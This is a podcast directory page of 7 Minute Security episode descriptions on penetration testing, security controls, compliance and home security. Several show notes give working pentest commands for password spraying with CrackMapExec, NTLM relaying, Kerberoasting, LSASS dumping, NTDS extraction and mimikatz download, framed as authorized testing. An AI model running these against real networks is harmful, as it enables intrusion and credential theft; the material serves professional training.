Technology
News
Tech News

7 Minute Security

Updated 2 months ago

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

iTunes Ratings

54 Ratings
Average Ratings
50
2
2
0
0

Great small bits of security

By Infinity dreamer 90 - Feb 20 2019
Thanks for sharing your security secrets!

Brian Johnson

By Caneron Johnson - May 06 2018
Hey this is Cameron Luis Fronodo Johnson and I’m your son bye Dad love you!! 👋

Latest release on Aug 12, 2020

Rank #1: 7MS #161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp

Feb 29 2016

8mins

Rank #2: 7MS #116: Tips for a Successful Vulnerability Scan

In this episode I complain about getting stuck in NY for two days, and also how to efficiently scan for vulnerabilities when your time is crunched.

Dec 08 2015

14mins

Rank #3: 7MS #291: The Quest for Critical Security Controls - Part 4

Did I mention I love the Critical Security Controls? I do. And here's an absolute diamond I found this week:

This site (http://www.auditscripts.com/free-resources/critical-security-controls/) offers awesome CSC-mapping tools (and they're free!), specifically:

  • A spreadsheet with how the CSCs map to other popular frameworks like ISO and NIST

  • A manual assessment tool for measuring your org - or someone else's org - against the CSCs. Flippin' sweet right? RIGHT!

Also, be sure to come and Slack chat with us, as my pal hackernovice is building a tool called MacMon to help you satisfy CSC #1!

Lastly, I built an LOL-worthy pentesting recon tool called SSOTT (Scan Some of the Things) that might help you automate some NMAPing, DIRBing, NIKTOing, and the like. Cheggitout!

Dec 21 2017

13mins

Rank #4: 7MS #299: Windows System Forensics 101

I had the privilege of creating a Windows System Forensics 101 course/presentation for a customer. The good/bad news is there is so much good information out there, it's hard to boil things down to just an hour.

For the first part of the presentation, I focused on Mark Russinovich's technique of using Sysinternals as the primary surgical tool. This approach includes things like:

  1. Use Process Explorer to find processes with no signature and/or description.

  2. Put any suspicious processes to sleep before killing them (it's more humane! :-)

  3. Use autoruns to find registry entries, scheduled tasks, etc. that might be hooked to malicious executables that run on startup.

  4. Rinse and repeat.

In part 2 (coming up soon!), I'll continue the forensics fight and talk about tools like Redline, Volatility and FTK Imager! Stay tuned.

Feb 28 2018

10mins

Rank #5: 7MS #155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

Feb 16 2016

9mins

Rank #6: 7MS #51: CEH vs. OSCP (audio)

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you. Here’s the article on CEH I mention during the episode – it has much more…

Apr 07 2015

7mins

Rank #7: 7MS #411: More Fun Stay-at-Home Security Projects

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome, building a headless pi-hole, redoing your network with a Dream Machine, and enjoying some music via Zoom by way of Q.U.A.C.K.

In this episode, we cover:

  • Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!

  • CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time!

  • Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSEC. Just make sure the date/time settings on the box are correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums....

Read more at 7ms.us!

Apr 24 2020

54mins

Rank #8: 7MS #365: Interview with Ryan Manship and Dave Dobrotka - Part 3

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

First, a bit of miscellany:

  • If you replace "red rain" with "red team" in this song, we might just have a red team anthem on our hands!

  • If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB. If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya!

Ok, in today's program we're talking about red teaming again with our third awesome installment with Ryan and Dave who are professional red teamers! Today we cover:

  • Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, the less likely you'll be surprised and the more likely you'll succeed at your objective!

  • Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things?

I also asked the questions folks submitted to me via LinkedIn/Slack:

  • Any tips for the most dreaded part of an assessment (reports)?

  • How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2?

  • What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness)

  • What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!").

  • Are customers happy to get assessed by a red team exercise, or do they do it begrudgingly because of requirements/regulations?

May 30 2019

1hr 8mins

Rank #9: 7MS #323: 7 Ways to Not Get Hacked

I'm putting together a general security awareness session aimed at helping individuals and businesses not get hacked. To play off the lucky number 7, I'm trying to boil this list down to 7 key things to focus on. Here's my list thus far:

  1. Passwords
  2. 2FA/MFA
  3. Wifi (put a good password on it, don't use WEP, don't use WPS)
  4. Sign up for HaveIBeenPwned
  5. Update all the things
  6. Block malware/mining with browser plugins
  7. Security awareness training

What do you think? Anything I missed or should consider swapping with another topic? Contact me!

Aug 16 2018

18mins

Rank #10: 7MS #363: Interview with Ryan Manship and Dave Dobrotka - Part 2

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

Yuss! It's true! Dave and Ryan are back!

Back in episode #326 we met Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup and talked about their cool and exciting careers as professional red teamers.

In this follow-up interview (which will be broken into a few parts), we talk through a red team engagement from start to finish. Today we cover questions like:

  • Who should have a red team exercise conducted? Who NEEDS one?

  • How do you choose an objective that makes sense?

  • What do you do about push-back from management and/or scope manipulation? (“Don’t phish our CEO! She’ll click stuff! Attack our servers, just not the production environment!!!”). Spoiler alert: your clients need to have intestinal fortitude!

  • What’s better - a “zero knowledge” red team engagement or a collaborative exercise between testers and their clients?

  • How do you attack a high-security bunker?!

  • How do you conduct a red team exercise without ending up in jail? What does your “get out of jail” card get you - and NOT get you?

May 15 2019

57mins

Rank #11: 7MS #94: Learn How to Burp - Part 1

I've been looking for better ways to learn Burp Suite and I struck gold! Check out my recommendations in today's episode!

Sep 15 2015

8mins

Rank #12: 7MS #100: Assessment Curses Can Be Blessings

Ever had an assessment that you thought would be the death of you? I had one recently, but after sticking it out, it turned out to be a blessing in disguise.

Oct 09 2015

7mins

Rank #13: 7MS #61: Why Local Admin Rights Suck (audio)

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights.

May 14 2015

8mins

Rank #14: 7MS #303: Evaluating Endpoint Protection Solutions

I'm working on a fun project right now where I'm evaluating endpoint protection solutions for a client. They're faced with a choice of either refreshing endpoints to the latest gen of their current product, or doing a rip and replace with something else.

I've spun up a standalone AD environment with ~5 Win 10 VMs and nothing on 'em except a current set of patches. The idea is I can assign each workstation VM an install of INSERT_NAME_OF_POPULAR_AV_VENDOR_HERE and have somewhat of a "bake off."

Now what I'm finding is that great sites like AV Test or AV-Comparatives do a nice job of breaking down what kind of performance, features, and management offerings a given vendor has. But what I haven't found is some structured testing for "act like a bad guy" actions. I'm thinking things like:

  • Mimikatz tomfoolery
  • Lateral attacks with Metasploit shells
  • Egress port scanning (to find an acceptable outbound port for C2 or data exfil)
  • Jacking around with various PowerShell scripts and commands

However, some awesome friends on Slack pointed me to what looks to be a nice set of scripts/tests - many of which could be used to see what kind of behaviors the endpoint protection will catch. So coming up in part #2 of this series, I'll do a deeper dive into:

Mar 29 2018

14mins

Rank #15: 7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

Ok I don’t really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I’ve been nerding out on the last few weeks.

Apr 22 2015

6mins

Rank #16: 7MS #57: How to Review a Firewall (audio)

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a firewall review/audit tool.

Apr 30 2015

8mins

Rank #17: 7MS #277: Patching Solutions Bake-Off - Part 3

ManageEngine Desktop Central

Overall, I have to bluntly say that I really enjoyed playing with ManageEngine's solution. It's got a crap-ton of features built into it - above and beyond patching - that I think IT/security folks will really appreciate.

Pros
  • Agent or agentless management of systems

  • MDM (didn't play with it but it certainly looks feature-rich)

  • Application white/blacklisting

  • Ability to push out configurations for things you'd normally use GPOs for - i.e. setting a login banner, enforcing screen locks, setting IE homepage and search engine, etc.

  • Patch management is full-featured - it's easy to setup a simple "scan systems, download and deploy missing patches." Or just a "scan to identify missing patches" kind of thing. It's easy to run a variety of reports to find out which systems are most vulnerable, which patches are missing across the enterprise, etc.

  • Software deployment engine - there's a big package library where you can easily search and deploy things like Dropbox, Adobe Reader, etc. It also includes a self-service portal where users can simply select certain packages and have them installed automagically!

  • Inventory - ability to have detailed hardware/software level details on each machine. Ability to block software by path and/or hash. You can also give people a warning saying "We're gonna nuke dropbox in 2 days if you keep it on here!"

  • Agent-based install gives you ability to chat with users, remote control systems, send announcements, drop to a command line at a target machine, etc.

  • Reports - you can create a report for just about anything under the sun like AD group changes, user logon reports, users that are disabled/expired, and on and on...

  • Email alerts - I think you can trigger an email alert for just about ANYTHING that happens in the environment.

...more on today's episode!

Sep 14 2017

13mins

Rank #18: 7MS #379: Tales of Internal Network Pentest Pwnage - Part 7

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

  • Review of setting up your DIY pentest dropbox
  • Choosing the right hardware (I'm partial to this NUC)
  • Running Responder to catch creds
  • Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
  • Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
  • Running Sharphound to get a map of the AD environment
  • Cracking creds with Paperspace
  • When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

Aug 30 2019

43mins

Rank #19: 7MS #364: Tales of External Pentest Pwnage

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

This episode features cool things I'm learning about external pentesting. But first, some updates:

  • My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink.

  • The 7MS User Group went well. We'll resume in the late summer or early fall and do a session on lockpicking!

  • Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow, what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful.

On the external pentest front, here are some items we cover in today's show:

  • MailSniper's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds!

  • Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax:

crackmapexec smb 192.168.0.0/24 -u USER -p 'PASSWORD' -d YOURDOMAIN

You can also find what shares you have access to with:

crackmapexec smb 192.168.0.0/24 -u USER -p 'PASSWORD' -d YOURDOMAIN --shares

Sift through those shares! They often have VERY delicious bits of information in them :-)

May 23 2019

36mins

Rank #20: 7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network “map” of my sniffing setup. It looks like this:

  • Ethernet from client -> upstream port of hub
  • My laptop with Wireshark -> Hub
  • Wifi access point -> Hub

To find…

Jun 09 2015

7mins

7MS #427: Interview with Ameesh Divatia from Baffle

Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including:

Misconfigured cloud databases

  • Why is this such a common issue, and how can we address it?
  • Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud?
  • What tools can we use to better secure our cloud databases?
  • How can we secure sensitive information as we migrate it from LAN side to the cloud?

CCPA (California Consumer Privacy Act)

  • What is the CCPA? How does it relate to GDPR?
  • If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know?
  • Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?"
  • Does CCPA only apply to California residents and companies?

Secure data sharing

  • What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns?

  • What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients?

  • What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?

Aug 12 2020

42mins

7MS #426: Tales of Internal Pentest Pwnage - Part 19

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense.

We've got another swell tale of internal pentest pwnage for you today! Highlights include:

  • If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes!

  • Here's one way you can grab the latest CME binary:

curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different:

cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable

  • If you're looking to block IPv6 (ab)use in your environment, this article has some great tips.

  • When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team.

  • Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords.

  • A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to.

  • I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more!

  • Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

Aug 07 2020

49mins

7MS #425: DIY Pentest Dropbox Tips - Part 2

Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said:

For the Windows VM

  • Turn on RDP with PowerShell:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

  • Change time zone with command line:

tzutil /s "Central Standard Time"

  • Install Chrome with PowerShell:

$LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound)

  • Install PowerUpSQL:

Install-Module -Name PowerUpSQL

  • Turn off sleepy time:

powercfg.exe -change -standby-timeout-ac 0

  • Install DotNet 3.5:

dism /online /Enable-Feature /FeatureName:"NetFx3"

For the Kali VM

  • Refresh the SSH keys:

apt install openssh-server -y
mkdir /etc/ssh/default_keys
mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/
dpkg-reconfigure openssh-server
systemctl enable ssh.service
systemctl start ssh.service

  • Get SharpHound and Mimikatz:

wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip
wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe

  • Install pypykatz:

sudo pip3 install pypykatz

  • Install CrackMapExec binaries (which at time of this publication is this one):

curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

Jul 30 2020

37mins

7MS #424: Cyber News - Everything is Pwned Edition

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

Jul 22 2020

33mins

7MS #423: Tales of Internal Pentest Pwnage - Part 18

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

  • Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
  • Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
  • Testing for MS14-025 is easy with this site.
  • mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:

smb://CORP\Administrator@192.168.195.2
smb://CORP\Administrator@192.168.195.3
smb://CORP\brian.admin@192.168.195.7
192.168.195.7
192.168.195.10

Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin

  • I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!

  • Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.

  • Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share

  • Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

pip3 install pypykatz
sudo pypykatz lsa minidump lsass.dmp > lsass.txt

Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to munch on!

Jul 15 2020

59mins

7MS #422: Eating the Security Dog Food - Part 2

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me (https://safepass.me/?7ms422) for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies:

  • Acceptable use
  • Data protection and privacy

Jul 10 2020

42mins

7MS #421: Cyber News - Verizon DBIR Edition

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network!

I'm especially excited because today's episode marks two important 7MS firsts:

Jul 01 2020

36mins

7MS #420: Tales of Internal Pentest Pwnage - Part 17

Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever.

I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig.

One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6).

This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included:

  • Capturing hashes with Responder
  • Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user)
  • Check for MS14-025 (see this article)
  • Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it
  • Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axfr)
  • Test for egress filtering of ports 1-1024
  • Took a backup of AD "the Microsoft way" and then cracked with secretsdump:

sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump

Jun 26 2020

44mins

7MS #419: Eating the Security Dog Food

Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS.

In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it:

  • Acceptable Use
  • Data Protection and Privacy
  • Physical Security
  • Tools and Technology
  • Training and Awareness
  • Reporting

Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog

Jun 17 2020

40mins

7MS #418: Securing Your Mental Health

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's episode is all about mental health! I talk about some of my challenges with stress/anxiety and how I finally put on my big boy pants, dropped some misconceptions and decided to do something about it. Additionally, this episode contains references to:

Jun 11 2020

44mins

7MS #417: Vulnerability Scanning Tips and Tricks

Today's episode is all about getting the most value out of your vulnerability scans, including:

  • Why, IMHO, you should only do credentialed scans

  • Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-)

  • How to make your scan report more actionable and less unruly

  • Turning up logging to 11 (use with caution!)

  • A small tweak to an external scan policy that can result in the difference between a successful or failed scan

  • The nessusd.rules file is awesome for excluding specific hosts and services from your scans

Jun 04 2020

43mins

7MS #416: Pi-hole 5.0

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Today we're talking about some of my favorite features of Pi-hole 5.0. Including:

  • WARNING! WARNING! Upgrading from 4.x is a one-way operation!

  • Per-client blocking (you can set up, for example, a group of machines called "kids" and apply specific domain block/allow lists and domains to them)

  • More granular detail (especially if there are issues) when blocklists get updated

  • Better, richer debug log output

I also talk about a great companion for your Pi-hole: a command-line Internet speed test! Hat tip to Javali over at the 7MS forums who told me about this.

Additionally, I briefly mention "Hashy" (the nickname of my password cracking rig), give you some stay-at-home streaming TV show recommendations, and give you a quick house rebuild update!

May 28 2020

35mins


7MS #415: Cyber News


Today's episode kicks off a fun little experiment where my pal Joe Skeen and I cover some of the week's interesting security news stories, how they might affect you, and what you can do to make you and your company more secure. This week's stories:

May 21 2020

31mins


7MS #414: Tales of Pentest Fail #4


SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today I'm excited to share more tales of pentest FAIL with you. Today's tales include:

  1. Accidentally scanning assets that belong to an agency that nobody should be messing with

  2. Delivering reports with vulnerabilities from somebody else's network

  3. Why it's important to write a report more than 15 minutes before delivery

  4. Lessons learned from firing a disgruntled employee

May 14 2020

1hr 4mins


7MS #413: PCI Professional Certification (PCIP) - Part 3


Hey everybody! I hope you're hanging in there during quarantine and staying healthy. Today is part 3 of our ongoing series all about becoming a PCIP. The good news is I'm finally, actually registered for the cert and have started diving into the training! So in today's episode I want to regurgitate some of what I'm learning to whet your appetite (or not) for this particular certification. Specifically, we cover:

  • The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data)

  • How and why payment card data is leaked/stolen/breached - and then sold/monetized

  • The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE

May 07 2020

51mins


7MS #412: Tips for Working Safely and Securely From Home


This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In today's episode we share some tips for working more safely and securely from home, which for many of us is our new office for the foreseeable future! Specifically, we cover:

  • Picking powerful passwords
  • Locking down your wifi
  • Defending your digital identity
  • Protecting your PC
  • Blocking icky stuff in your browser
  • Composing careful conference calls
  • Clicking links carefully

I've also made this episode available in long-form blog here. Please feel free to share with anybody you think could benefit from the info!

May 01 2020

45mins


7MS #411: More Fun Stay-at-Home Security Projects


SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome, building a headless pi-hole, redoing your network with a Dream Machine, and enjoying some music via Zoom by way of Q.U.A.C.K.

In this episode, we cover:

  • Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!

  • CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time!

  • Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSEC. Just make sure your date/time settings on the box are correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums....

Read more at 7ms.us!

Apr 24 2020

54mins


7MS #410: PCI Professional Certification (PCIP) - Part 2


This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

I’m gonna love you like coronavirus, I don’t know what else to say
I’m gonna love you like coronavirus, I’m gonna stand 6 feet away
Yes our love was meant to be, but it will have to wait until later
Cuz I don’t wanna end up hooked up to a ventilator

In today's episode I continue sharing my journey about becoming a PCIP. Spoiler alert: I'm still applying to even start training to be one. Here's what we'll cover:

  • The pentesting requirement 11.3 from PCI that kind of boggles my brain, and some advice I got from a PCI guru that helped clear things up for me. This video also helped me better understand requirement 11.3.

  • The super sucky couple of personal quarantine days I’ve had that include:

    • Cocoa that tastes like mint-flavored old lady diarrhea
    • Our fridge and freezer going ka-put
    • Exploding drinks in my fridge
    • A multi-thousand dollar repair on our new house that hasn’t even technically broken ground yet (!)

Apr 16 2020

57mins


7MS #409: PCI Professional Certification (PCIP)


SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today I'm starting a journey to become a PCI Professional (PCIP), and I'll be periodically updating the status of this journey on the 7MS forums.

You don't need to be a QSA to get a PCIP, but you do need "2 years in IT or payments related background to have your application approved."

The PCIP certification gives you (and I'm quoting from the PCI Web site):

  • Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards
  • Understanding of PCI DSS requirements and intent
  • Overview of basic payment industry terminology
  • Understanding the transaction flow
  • Implementing a risk-based prioritized approach
  • Appropriate uses of compensating controls
  • Working with third-parties and service providers
  • How and when to use Self-Assessment Questionnaires (SAQs)
  • Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud)

The test costs + exam for a non-participating organization (like 7MS) is $2,500. You also have to re-up every 3 years for $260 (yay, another thing to have to pay for regularly).

In the miscellany department:

  • Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness.

  • A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here!

Apr 09 2020

40mins


7MS #408: Cell Phone Security for Tweenagers - Part 2


This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS

"I think of what the world could be
If it did not have COVID-19
A million dreams is all it's gonna taaaaaaaaaaaaaaaake!"

Today's episode is a continuation and update on the cell phone security for tweenagers episode from about a year ago. Specifically, I talk about:

  • How the cell phone contract I put together for my tweenager kind of blew up in my face
  • I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely.
  • Apple Screen Time is your friend, and helps put some limits on iDevice use
  • The Dream Machine makes it easy to set up a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day
  • You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks
  • If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors.

More info at 7ms.us!

Apr 03 2020

32mins

